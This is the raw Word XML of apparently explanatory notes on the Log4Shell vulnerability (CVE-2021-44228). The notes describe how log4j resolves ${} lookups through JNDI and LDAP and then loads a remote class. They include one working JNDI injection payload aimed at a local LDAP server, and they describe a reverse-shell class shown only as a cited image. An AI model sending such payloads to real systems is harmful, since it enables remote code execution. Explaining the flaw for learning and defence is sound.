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EADCE7" w14:textId="6F7564D0" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="005A754F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2021-44228 Log4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A96A1E" w14:textId="3FE62865" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>What is log4j?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA88D12" w14:textId="5CBD96C0" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Log4j2 is an open-source java logging framework widely used for recording log information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330A67C5" w14:textId="0E78C17A" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The Log4j module has been utilised in many applications because it enables a java-based service to handle internal event logging more </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>efficiently.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF5B323" w14:textId="3726EC93" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E8D21" w14:textId="5622C91A" w:rsidR="00572ABA" w:rsidRPr="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:r>
        <w:t>Java application using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C4067F" w14:textId="3576D390" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Log4j-api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9F1E72" w14:textId="6D27E592" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Log4j-core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0111B219" w14:textId="3D6A68C7" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit principle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CF2632" w14:textId="36426FC9" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:r>
        <w:t>When the system uses log4j to print the information entered by the user to the log in the form of ${}, this can lead to a JNDI injection vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D925AC" w14:textId="77777777" w:rsidR="00572ABA" w:rsidRPr="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00572ABA">
        <w:t>Principle of log4j2 vulnerability - why does it exist?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8713A6" w14:textId="77777777" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The main point is Log4j 2 (log4j-api and log4j-core) supports parsing the LDAP/RMI protocol by default and will obtain the corresponding “class” file from the LDAP server by name and use the class loader to load the “class” class returned by the LDAP server locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C098AD1" w14:textId="77777777" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The attacker can control the log messages or log message parameters by sending a string with malicious LDAP content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351F40A7" w14:textId="77777777" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3136"/>
      </w:tblGrid>
      <w:tr w:rsidR="00572ABA" w14:paraId="1EEBECE7" w14:textId="77777777" w:rsidTr="00572ABA">
        <w:trPr>
          <w:trHeight w:val="4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002083" w14:textId="77777777" w:rsidR="00572ABA" w:rsidRDefault="00572ABA">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> $</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>jndi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
              </w:rPr>
              <w:t>ldap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="00FF00"/>
              </w:rPr>
              <w:t>://localhost:1389/a</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BEC0CF1" w14:textId="77777777" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jndi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → tell the app to do a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>jndi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lookup load whatever onto the app, in this case is to lookup the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> server (ldap://localhost:1389) to fetch the object (/a) and load it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B96E25" w14:textId="00829193" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C1753B9" wp14:editId="7FFA7CBE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>356135</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>127034</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3205480" cy="2889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05480" cy="288925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46285A17" wp14:editId="6524B89C">
            <wp:extent cx="5731510" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>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990600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Picture is from</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="000000"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>https://github.com/kozmer/log4j-shell-poc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29C326D5" w14:textId="209B6787" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">From the above picture, when the server receives the string ${} that type in the username, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">logger </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logManager.getlogeer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(com.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>example.log4shell.log</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4j.class) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>will print it as a log via the Logj42 tool. At this point, Log4j2 will parse ${} and read the content. It is judged that it is JNDI implemented by L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Then, complete the Lookup operation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The lookup operation will request the LDAP server (malicious server), get a codebase address, and then tell the client to go to this codebase address to get the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB5855B" w14:textId="77777777" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Here is the example class code(/a) which will execute the /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> command on localhost port 9001. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C9D4F1" w14:textId="50C14C40" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6420368A" wp14:editId="30809AD9">
            <wp:extent cx="3397885" cy="1174115"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>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7885" cy="1174115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFAF612" w14:textId="77777777" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Picture is from</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="000000"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>https://github.com/kozmer/log4j-shell-poc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FBEE62E" w14:textId="77777777" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> Last, Java requests the Codebase server (malicious server) to get the corresponding class (malicious class) and loads and instantiates it locally (triggering malicious code).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59916427" w14:textId="77777777" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The principle to exploit this vulnerability is when the system uses log4j to print the information entered by the user to the log in the form of ${}, a JNDI remote code execution vulnerability occurs. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BC064F" w14:textId="77777777" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JNDI is a java interface (API) that allows you to basically fetch remote objects from a server and load it. If the object fetched is java machine code, it will Indiscriminate execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9F0A60" w14:textId="1EEA1FB5" w:rsidR="00572ABA" w:rsidRDefault="00572ABA" w:rsidP="00572ABA"/>
    <w:sectPr w:rsidR="00572A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D51E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="170EB6F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75C969E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C4C177A"/>
    <w:lvl w:ilvl="0" w:tplc="239EC094">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia"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882088988">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="10131915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a3MDO1MLC0MDE2NzBW0lEKTi0uzszPAykwrAUATsGYRywAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="0029557E"/>
    <w:rsid w:val="00212934"/>
    <w:rsid w:val="0029557E"/>
    <w:rsid w:val="00572ABA"/>
    <w:rsid w:val="005A754F"/>
    <w:rsid w:val="009B319D"/>
    <w:rsid w:val="00DF46C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A1280"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{922DFBFD-6FC0-4AED-BE09-1659433CE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2AB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2ABA"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00572ABA"/>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572AB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72ABA"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="005A754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54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3957654">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2063096624">
